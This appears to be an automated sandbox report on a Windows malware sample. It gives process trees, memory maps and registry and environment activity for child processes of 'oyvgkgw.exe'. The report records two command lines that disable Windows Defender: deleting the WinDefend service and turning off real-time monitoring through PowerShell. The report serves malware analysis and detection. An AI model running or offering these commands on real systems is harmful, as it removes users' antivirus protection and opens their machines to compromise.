private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d00000 0x01d00000 0x02042fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Open STD_OUTPUT_HANDLE - True 5
Open STD_INPUT_HANDLE - True 3
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Get Time type = Ticks, time = 269070 True 1
Environment (19)
Operation Additional Information Success Count
Get Environment String - True 7
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000005 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #16: cmd.exe
Information Value
ID #16
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x77c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xDC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0061ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x022e2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Open STD_OUTPUT_HANDLE - True 5
Open STD_INPUT_HANDLE - True 3
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Get Time type = Ticks, time = 269086 True 1
Environment (19)
Operation Additional Information Success Count
Get Environment String - True 7
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000005 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #17: cmd.exe
55 0
Information Value
ID #17
File Name c:\windows\syswow64\cmd.exe
Command Line /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
Information Value
PID 0x648
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x250
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000630000 0x00630000 0x007b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000820000 0x00820000 0x0091ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000920000 0x00920000 0x00aa0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ab0000 0x00ab0000 0x01eaffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x021f2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Get Info C:\Windows\system32 type = file_attributes True 1
Get Info C:\Windows\System32 type = file_attributes True 1
Open STD_OUTPUT_HANDLE - True 5
Open STD_INPUT_HANDLE - True 3
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
System (2)
Operation Additional Information Success Count
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Get Time type = Ticks, time = 269086 True 1
Environment (18)
Operation Additional Information Success Count
Get Environment String - True 7
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000001 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #18: powershell.exe
205 0
Information Value
ID #18
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x914
Parent PID 0x648 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x3C4
0x748
0x9C0
0x9DC
0x9AC
0x9C4
0x4B4
0x37C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00130000 0x00132fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
